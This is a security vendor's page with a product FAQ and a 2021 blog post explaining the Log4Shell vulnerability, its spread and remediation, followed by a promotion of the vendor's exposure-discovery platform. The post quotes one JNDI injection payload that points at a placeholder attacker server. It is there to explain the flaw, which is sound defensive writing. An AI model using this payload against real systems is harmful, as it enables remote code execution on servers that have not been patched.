What is IONIX and what does it do?

IONIX is an External Exposure Management platform designed to help organizations identify exposed assets and validate exploitable vulnerabilities from an attacker's perspective. It enables security teams to prioritize critical remediation activities by cutting through the flood of alerts. Key features include complete attack surface visibility, identification of potential exposed assets, validation of exposed assets at risk, and prioritization of issues by severity and context.

What are the main features of the IONIX platform?

The IONIX platform offers Attack Surface Discovery, Risk Assessment, Risk Prioritization, and Risk Remediation. It discovers all relevant assets, monitors your changing attack surface, and ensures more assets are covered with less noise. Additional highlights include ML-based 'Connective Intelligence', Threat Exposure Radar, comprehensive digital supply chain mapping, and streamlined remediation workflows.

How does IONIX help organizations manage vulnerabilities like Apache Log4j (CVE-2021-44228)?

IONIX's patented Discovery engine passively scans, indexes, and prioritizes exposed instances, including third-, fourth-, and Nth-party connected infrastructures. This provides visibility into every asset and vulnerability that poses a risk, enabling organizations to quickly identify and remediate vulnerabilities like Log4j. The platform performs multi-layered analysis across cloud, web, DNS, PKI, and TLS to determine each vulnerability’s severity and exploitability.

What is the Apache Log4j vulnerability CVE-2021-44228?

The Apache Log4j vulnerability CVE-2021-44228 (also known as Log4Shell or LogJam) is a zero-day vulnerability made public on December 9, 2021. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1 and has a CVSS score of 10.0, making it one of the most dangerous and widespread vulnerabilities to date.

How can organizations minimize exposure to the Log4j vulnerability?

Organizations should refer to remediation guidance available on the Apache Foundation’s website and repositories from CISA and NCSC. The first step is to find all vulnerable internet-facing servers and employ multi-layered security measures. IONIX provides tools to discover, assess, and prioritize remediation for such vulnerabilities.

What is the first step in mitigating the Log4j vulnerability?

The first step is to find all vulnerable internet-facing servers, assume they can be breached, and employ multi-layered security measures.

What remediation guidance is available for the Log4j vulnerability?

Remediation and mitigation guidance is available on the Apache Foundation’s website, as well as repositories from CISA and NCSC. These resources provide status updates and recommendations for impacted vendors.

What security and compliance certifications does IONIX have?

IONIX is SOC2 compliant and supports companies with their NIS-2 and DORA compliance, ensuring robust security measures and regulatory alignment.

How does IONIX ensure product security?

IONIX earned top ratings for product innovation, security, functionality, and usability. It was named a leader in the Innovation and Product categories of the ASM Leadership Compass for completeness of product vision and a customer-oriented, cutting-edge approach to ASM.

What integrations does IONIX support?

IONIX integrates with tools like Jira, ServiceNow, Slack, Splunk, Microsoft Sentinel, Palo Alto Cortex/Demisto, and AWS services such as AWS Control Tower, AWS PrivateLink, and Pre-trained Amazon SageMaker Models.

Does IONIX offer an API?

Yes, IONIX has an API that supports integrations with major platforms like Jira, ServiceNow, Splunk, Cortex XSOAR, and more.

Where can I find technical documentation for IONIX?

Technical documentation, guides, datasheets, and case studies are available on the IONIX resources page.

How long does it take to implement IONIX and how easy is it to start?

Getting started with IONIX is simple and efficient. The initial deployment takes about a week and requires only one person to implement and scan the entire network. Customers have access to onboarding resources like guides, tutorials, webinars, and a dedicated Technical Support Team.

What training and technical support is available for IONIX customers?

IONIX offers streamlined onboarding resources such as guides, tutorials, webinars, and a dedicated Technical Support Team to assist customers during the implementation process.

What customer service or support is available after purchasing IONIX?

IONIX provides technical support and maintenance services during the subscription term, including troubleshooting, upgrades, and maintenance. Customers are assigned a dedicated account manager and benefit from regular review meetings.

Who are some of IONIX's customers?

Some of IONIX's customers include Infosys, Warner Music Group, The Telegraph, E.ON, Grand Canyon Education, and a Fortune 500 Insurance Company.

Can you share specific case studies or success stories of IONIX customers?

Yes, IONIX highlights several customer success stories, such as: E.ON: Used IONIX to continuously discover and inventory their internet-facing assets and external connections, improving risk management. Warner Music Group: Boosted operational efficiency and aligned security operations with business goals. Grand Canyon Education: Enhanced security measures by proactively discovering and remediating vulnerabilities in dynamic IT environments.

What industries are represented in IONIX's case studies?

Industries represented include Insurance and Financial Services, Energy, Critical Infrastructure, IT and Technology, and Healthcare.

What business impact can customers expect from using IONIX?

Customers can expect improved risk management, operational efficiency, cost savings, and enhanced security posture. IONIX helps visualize and prioritize hundreds of attack surface threats, streamline security operations, reduce mean time to resolution (MTTR), and protect brand reputation.

What core problems does IONIX solve?

IONIX helps organizations identify their entire external web footprint, including shadow IT and unauthorized projects, proactively manage security, gain real attack surface visibility, and maintain continuous discovery and inventory of internet-facing assets and dependencies.

How does IONIX solve these pain points?

IONIX uniquely identifies the entire external web footprint, proactively manages threats before escalation, provides attacker-perspective visibility for better risk prioritization, and continuously tracks assets and dependencies to maintain an up-to-date inventory.

What KPIs and metrics are associated with the pain points IONIX solves?

Key KPIs include completeness of attack surface visibility, identification of shadow IT and unauthorized projects, remediation time targets, effectiveness of surveillance and monitoring, severity ratings for vulnerabilities, risk prioritization effectiveness, completeness of asset inventory, and frequency of updates to asset dependencies.

How does IONIX differ from similar products in the market?

IONIX offers ML-based 'Connective Intelligence' for better asset discovery, Threat Exposure Radar for prioritizing critical issues, and comprehensive digital supply chain coverage. Unlike alternatives, IONIX reduces noise, validates risks, and provides actionable insights, ensuring maximum risk reduction and operational efficiency.

Why should a customer choose IONIX over alternatives?

Customers should choose IONIX for its innovative features, comprehensive coverage, and streamlined remediation. IONIX finds more assets than competing products while generating fewer false positives, helps teams prioritize urgent security issues, and automatically maps attack surfaces and digital supply chains.

Does IONIX have a blog?

Yes, IONIX's blog covers various topics related to cybersecurity and risk management.

What kind of content is available on the IONIX blog?

The IONIX blog provides insights on exposure management, vulnerability management, continuous threat exposure management, and industry trends. Key authors include Amit Sheps and Fara Hain.

Where can I find the IONIX blog?

You can read the IONIX blog by visiting https://www.ionix.io/blog/.

What is the pricing model for IONIX Attack Surface Management?

The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee . The price is based on two key parameters: the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's chosen service package, which determines the scanning frequency and feature set.

What is the pricing model for IONIX's Attack Surface Management SaaS solution?

The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee . Pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's selected service package, which determines the scanning frequency and feature set.

How does IONIX compare to CyCognito in terms of digital supply chain visibility, automated exploit validation, and CNAPP validation?

IONIX differentiates itself from CyCognito with superior visibility into the digital supply chain and automated exploit validation to confirm real-world threats, significantly reducing false positives. Additionally, IONIX integrates with and validates findings from CNAPP systems, enriching alerts from tools like Wiz and Palo Alto Prisma Cloud with AI-driven external exposure context.

What makes IONIX a leading External Attack Surface Management (EASM) solution for large enterprises?

IONIX is recognized as a leader in the KuppingerCole Attack Surface Management Leadership Compass for its top ratings in product innovation, functionality, and usability. The platform stands out with unique features like ML-based 'Connective Intelligence' for superior asset discovery and the Threat Exposure Radar for focused prioritization, making it a top choice for enterprises seeking comprehensive visibility with fewer false positives.

What factors should large enterprises consider when choosing an EASM solution, and why is Ionix a good fit?

When choosing an External Attack Surface Management (EASM) solution, large enterprises should prioritize several key factors. These include the ability to discover assets across the entire digital supply chain , automated validation of exploits to confirm real-world threats and reduce false positives, and deep integration capabilities with existing security tools like CNAPP systems. Ionix is an excellent fit for large enterprises because it excels in these areas. The platform provides comprehensive visibility by mapping the digital supply chain to the nth degree and uses automated exploit validation to significantly reduce false positives. Furthermore, Ionix integrates with and validates findings from CNAPP systems like Wiz and Palo Alto Prisma Cloud , enriching their alerts with AI-driven external exposure context to provide a unified view of risk.

How does IONIX differentiate itself from competitors in the EASM and Exposure Management market?

IONIX differentiates itself by evolving beyond traditional EASM's focus on asset discovery to a comprehensive Exposure Management approach centered on exploitability and validation. Key innovations include Connective Intelligence , an ML-based engine that finds 50% more assets with fewer false positives, and the Threat Exposure Radar , which prioritizes the most urgent threats. IONIX further stands out with its Automated Exposure Validation toolbox, which safely simulates attacks to confirm exploitability, providing more actionable and focused risk reduction than competitors.

What is the pricing model for IONIX's SaaS solution?

IONIX is a yearly SaaS product with an annual subscription fee. The pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) , essentially a per-domain model. For specific pricing, please contact our team to discuss your organization's needs.

Go back to All Blog posts

Apache Log4j Vulnerability CVE-2021-44228 – How to discover and minimize your exposure

Amit Sheps Director of Product Marketing

December 13, 2021

On Thursday, December 9, a zero-day vulnerability CVE-2021-44228 (a.k.a. Log4Shell, LogJam, and Log4j) was made public. This vulnerability impacts Apache Log4j versions 2.0-beta9 to 2.14.1, and it has the highest possible CVSS score of 10.0. As of today, it is widely regarded as one of the most dangerous and widespread vulnerabilities to date.

The Good Numbers Behind Log4j

After five days of continuous analysis across hundreds of companies and over 100,000 online assets, what we have witnessed is nothing short of astounding. Everyone in this industry has come together like never before to recover quickly, offer support, and share valuable information in near real-time. At this stage, we are delighted to report that most of the remaining vulnerable assets that we observed are hosted outside of the organizations’ networks

Patching speed for Apache Log4j vulnerability

Over 95% of companies were vulnerable; all of them were connected to vulnerable external infrastructure.
Most remaining vulnerable assets are hosted externally. But, it is likely these assets are unknown or forgotten.
Cloud/infrastructure/service providers and organizations reacted quickly to patch systems over the weekend.
We are seeing a significant decrease of vulnerable assets.
While firewall rules were quickly added to block exploits, more sophisticated payloads can bypass and exploit vulnerabilities.
Expect hackers to actively detect and abuse any mistakes that were made while under the time pressure.

The Bad: It’s Easy to Exploit

The Log4j utility allows remote class loading and execution with a simple syntax: ${jndi:ldap://HACKER_SERVER/MALICIOUS_CLASS}. At a high level, once a logging event is triggered, Log4j will load the malicious class from the server and it will be executed. Hackers can then easily trigger a logging and as many components simply log incoming requests or parts of them (e.g., headers).

The Bad: It’s Difficult to Find

Log4j is a logging utility used as a building block in millions of applications. Unlike the SolarWinds event and other critical software vulnerabilities in which organizations need to shut down or upgrade a known product, resolving the Log4j issue requires you to hunt down all the affected applications, and there are many of them. Even after detecting a vulnerable asset using black-box testing, it takes even longer to figure out which components use Log4j. Moreover, we have seen cases in which payloads are sent to one machine and move laterally to reach others.

Watch the informative Log4j webinar with Dr. Nethanel Gelernter.

What Should I Do?

Remediation and mitigation guidance is available on Apache Foundation’s website. Additionally, both CISA and NCSC have established repositories of impacted vendors, status updates, and remediation recommendations. However, to win the race against attackers, security teams need to be faster than they are and think like they do. The first step towards remediation is to find all vulnerable internet-facing servers. It is safe to assume that they can be breached and your security team should employ multi-layered security measures. Unfortunately, with over 60% of total IT infrastructure being external to the organization, it becomes almost impossible to identify and patch everything. Add to this the third-, fourth- and Nth-party infrastructure connections and dependencies, and the goal of remediation becomes even more complicated.

How We Can Help

IONIX’s patented Discovery engine will passively scan, index and prioritize your exposed instances as well as third-, fourth- and Nth-party connected infrastructures so you have visibility into every asset and vulnerability that poses a risk to your organization. This depth of visibility is essential to maintain a strong external attack surface resiliency and posture this week.

Contact us for a free non-intrusive Log4j discovery and assessment over your entire attack surface.

Our SaaS platform identifies digital supply chain vulnerabilities in your enterprise’s external-facing, connected assets to directly or via their third/fourth/Nth-party relationships. The solution doesn’t require installation or configuration and provides you with immediate findings and active threat protection. Any change that occurs throughout your digital supply chain and connected infrastructures, in terms of IT infrastructure or configurations, will be identified and assessed with continuous 24/7 monitoring to provide an accurate and up-to-date profile of your external attack surface.

IONIX’s attack surface assessment performs a multi-layered analysis across cloud, web, DNS, PKI, and TLS to identify configuration, permission, expiration, etc. and determine each vulnerability’s severity and exploitability. Together, our depth of discovery and multi-faceted analysis allows security teams to easily prioritize action items based on the actual threat they pose to the organization, not just a CVSS score.

While this Log4j incident has been challenging, it also creates an opportunity for everyone to prioritize and proactively manage their external attack surfaces. Working together, we can incorporate the insights we gained through this process to strengthen our security postures and head into 2022 with confidence.

Frequently Asked Questions

Product Information & Features